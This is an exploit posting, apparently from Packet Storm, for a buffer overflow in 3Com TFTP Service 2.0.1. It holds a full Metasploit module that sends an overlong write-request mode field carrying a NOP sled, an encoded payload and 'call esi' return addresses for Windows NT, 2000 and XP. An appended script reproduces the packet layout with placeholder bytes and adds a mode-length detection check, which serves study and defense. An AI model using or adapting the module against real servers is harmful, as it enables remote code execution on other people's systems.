
3comtftp.txt

06 Dec 2006
Reported by Kurt Grutzmacher
Source: packetstormsecurity.com

3Com TFTP Service version 2.0.1 suffers from a buffer overflow triggered by an overlong transfer-mode ("type") field in a TFTP write request (WRQ); the attacker gains control of ESI.

Code
Doesn't look like SEH is being overwritten so I'm having trouble getting
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K.
Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

```ruby
require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

  include Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => '3CTftpSvc Server 2.0.1 Long Request Buffer Overflow',
      'Description'    => %q{
          3Com TFTP Service version 2.0.1 suffers from a long type buffer
        overflow during a write TFTP request. Does not require write access
        to be enabled on the server.

        Attacker controls ESI.

        Liu Qixu of NCNIPC published this vulnerability.
      },
      'Author'         => 'grutz [at] jingojango.net',
      'Version'        => '$$',
      'References'     =>
        [
          ['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
          ['BID', '21301'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 440,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',

      'Targets'        =>
        [
          ['Windows 2000 All SP English', { 'Ret' => 0x750217ae } ], # call esi ws2help
          ['Windows XP SP2 English',      { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
          ['Windows NT SP5/6 English',    { 'Ret' => 0x776a117e } ], # call esi ws2help
        ],

      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 27 2006'
    ))

    register_options(
      [
        Opt::RPORT(69)
      ], self)
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # WRQ (opcode 2), a one-byte random filename, its NUL terminator, then an
    # overlong transfer-mode field: 473 NOPs, the "call esi" address
    # (little-endian) and the closing NUL.
    sploit =
      "\x00\x02" +
      Rex::Text.rand_text_english(1, payload_badchars) +
      "\x00" +
      make_nops(473) +
      [target.ret].pack('V') +
      "\x00"

    # Patch the encoded payload into the NOP sled at packet offset 9
    sploit[9, payload.encoded.length] = payload.encoded

    udp_sock.put(sploit)

    disconnect_udp
  end

end
end
```

--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
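As an added example (not part of the original module, of Metasploit, or of 3Com's software), the following standalone Ruby script builds and parses TFTP read/write requests without the Rex helpers, reproduces the byte layout of the module's `sploit` buffer with placeholder bytes, and shows the detection check a practitioner would want: RFC 1350 allows only the modes netascii, octet and mail, so a mode field longer than 8 bytes or outside that set cannot come from a legitimate client. The 0x90 NOP bytes (standing in for `make_nops`), the 0xCC payload bytes (standing in for the encoded payload) and the file names are constructed placeholders.

```ruby
# Added example: TFTP RRQ/WRQ builder, parser and mode-field check.
# Constructed for illustration; not code from the 3CTftpSvc module.

TFTP_RRQ = 1
TFTP_WRQ = 2
# RFC 1350 transfer modes; "netascii" (8 bytes) is the longest legitimate value.
VALID_MODES = %w[netascii octet mail].freeze

# Layout: opcode (2 bytes, big-endian) | filename | NUL | mode | NUL
def build_request(opcode, filename, mode)
  ([opcode].pack('n') + filename.b + "\x00".b + mode.b + "\x00".b).b
end

# Parse a RRQ/WRQ. Returns nil for any packet that is not a well-formed request
# (too short, other opcode, or a missing NUL terminator).
def parse_request(pkt)
  pkt = pkt.b
  return nil if pkt.bytesize < 4
  opcode = pkt.unpack1('n')
  return nil unless opcode == TFTP_RRQ || opcode == TFTP_WRQ
  fn_end = pkt.index("\x00".b, 2)
  return nil if fn_end.nil?
  mode_end = pkt.index("\x00".b, fn_end + 1)
  return nil if mode_end.nil?
  {
    opcode:      opcode,
    filename:    pkt.byteslice(2, fn_end - 2),
    mode:        pkt.byteslice(fn_end + 1, mode_end - fn_end - 1),
    mode_offset: fn_end + 1,
  }
end

# Detection check: modes are case-insensitive per RFC 1350, so compare lowercased;
# anything longer than 8 bytes or outside the RFC set is flagged.
def suspicious_mode?(req)
  mode = req[:mode]
  mode.bytesize > 8 || !VALID_MODES.include?(mode.downcase)
end

# Same layout as the module's `sploit` buffer: WRQ, one-byte filename, NUL,
# 473 NOPs with the payload patched in at packet offset 9, the return address
# (little-endian) and a closing NUL. `payload` is a placeholder, not shellcode.
def exploit_layout(ret, payload)
  pkt = "\x00\x02".b + "A".b + "\x00".b + ("\x90".b * 473) + [ret].pack('V') + "\x00".b
  pkt[9, payload.bytesize] = payload.b
  pkt
end

if __FILE__ == $0
  [build_request(TFTP_WRQ, 'boot.cfg', 'octet'),
   exploit_layout(0x750217ae, "\xcc".b * 440)].each do |pkt|
    req = parse_request(pkt)
    puts "opcode=#{req[:opcode]} mode_len=#{req[:mode].bytesize} " \
         "mode_offset=#{req[:mode_offset]} suspicious=#{suspicious_mode?(req)}"
  end
end
```

Parsing the reconstructed exploit request shows a 477-byte mode field starting at packet offset 4, with the return address at offset 477 and the payload bytes at offset 9, exactly as the module assembles it. A mode-length check on the server before the copy, or a TFTP-aware IDS rule on the same field, catches this class of request regardless of which `call esi` address is used.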
